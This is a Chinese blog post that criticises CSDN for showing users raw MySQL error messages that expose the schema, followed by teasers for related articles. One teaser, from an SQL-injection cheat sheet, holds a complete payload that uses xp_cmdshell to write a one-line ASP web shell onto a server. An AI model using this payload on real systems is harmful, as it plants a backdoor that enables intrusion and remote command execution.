CSDN的数据出错直接抛出错误SQL文
今天在上CSDN空间的时候,数据库出错直接抛出SQL文了,消息如下:
MySQL Error
Message
: MySQL Query Error
SQL
: SELECT main.*, field.* from uchome_space main, uchome_spacefield field
WHERE field.sex='1' AND field.uid=main.uid
ORDER BY main.viewnum DESC LIMIT 0,100
Error
: Incorrect key file for table '/tmp/#sql_2a52_0.MYI'; try to repair it
Errno.
: 126
一般来说这种错误的消息是不让外部看的,就是catch后报一个系统错就好了。
如果上面的这个样子的话,即使不懂得人也知道我们的用的MySQL数据库。还有就是看到了表名和字段名,和检索逻辑。
在安全性上并不是值得提倡的。
相关文档:
作者:罗代均 ldj_work#126.com 转载请保持完整性
1.测试表
employee
雇员id 部门id 薪金
emp_id dept_id salary
......
最详细的SQL注入语句相关的命令整理
1、 用^转义字符来写ASP(一句话木马)文件的方法:
http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';- ......
一、深入浅出理解索引结构
改善SQL语句
很多人不知道SQL语句在SQL SERVER中是如何执行的,他们担心自己所写的SQL语句会被SQL SERVER误解。比如:
select * from table1 where name=''zhangsan'' and tID > 10000
和执行:
select * from table1 where tID > 10000 and name=''zhangsan''
一些人不知道 ......
实现小数据量和海量数据的通用分页显示存储过程
建立一个 Web 应用,分页浏览功能必不可少。这个问题是数据库处理中十分常见的问题。经典的数据分页方法是:ADO 纪录集分页法,也就是利用ADO自带的分页功能(利用游标)来实现分页。但这种分页方法仅适用于较小数据量的情形,因为游标本身有缺点:游标是存放在内存中, ......
JAVA-字符串过滤类
package cn.com.hbivt.util;
/**
* Title:
*
* Description:
*
* Copyright: Copyright (c) 2005
*
* Company:
*
* @author not attributable
* @version 1.0
*/
public class StringUtils {
......
